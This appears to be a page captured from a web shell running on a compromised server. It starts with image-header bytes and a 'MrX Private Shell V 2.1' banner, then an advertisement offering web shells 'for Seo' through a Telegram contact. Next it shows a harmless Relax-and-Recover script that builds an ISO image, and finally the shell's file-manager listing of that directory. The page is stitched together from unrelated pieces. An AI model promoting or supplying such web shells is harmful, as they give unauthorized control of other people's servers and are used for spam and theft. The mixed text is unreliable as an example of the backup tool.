����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
is_true $EFI_STUB || return 0
Log "EFI_STUB: Starting '$ISO_MKISOFS_BIN'"
LogPrint "EFI_STUB: Making ISO image"
pushd $TMP_DIR/isofs >/dev/null
# Error out when files greater or equal ISO_FILE_SIZE_LIMIT should be included in the ISO (cf. default.conf).
# Consider all regular files and follow symbolic links to also get regular files where symlinks point to:
assert_ISO_FILE_SIZE_LIMIT $( find -L . -type f )
$ISO_MKISOFS_BIN $v $ISO_MKISOFS_OPTS -o "$ISO_DIR/$ISO_PREFIX.iso" \
-b isolinux/isolinux.bin -c isolinux/boot.cat \
-no-emul-boot -boot-load-size 4 -boot-info-table \
-R -J -volid "$ISO_VOLID" -v -iso-level 3 . >/dev/null
StopIfError "EFI_STUB: Could not create ISO image (with $ISO_MKISOFS_BIN)"
popd >/dev/null
iso_image_size=( $(du -h "$ISO_DIR/$ISO_PREFIX.iso") )
LogPrint "EFI_STUB: Wrote ISO image: $ISO_DIR/$ISO_PREFIX.iso ($iso_image_size)"
# Add ISO image to result files
RESULT_FILES+=( "$ISO_DIR/$ISO_PREFIX.iso" )
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| 250_populate_efibootimg.sh | File | 8.5 KB | 0644 |
|
| 260_EFISTUB_populate.sh | File | 2.12 KB | 0644 |
|
| 300_create_isolinux.sh | File | 513 B | 0644 |
|
| 700_create_efibootimg.sh | File | 5.68 KB | 0644 |
|
| 800_create_isofs.sh | File | 1.31 KB | 0644 |
|
| 810_prepare_multiple_iso.sh | File | 4.75 KB | 0644 |
|
| 820_create_iso_image.sh | File | 1.85 KB | 0644 |
|
| 830_create_iso_image_EFISTUB.sh | File | 958 B | 0644 |
|
| 850_check_for_errors.sh | File | 241 B | 0644 |
|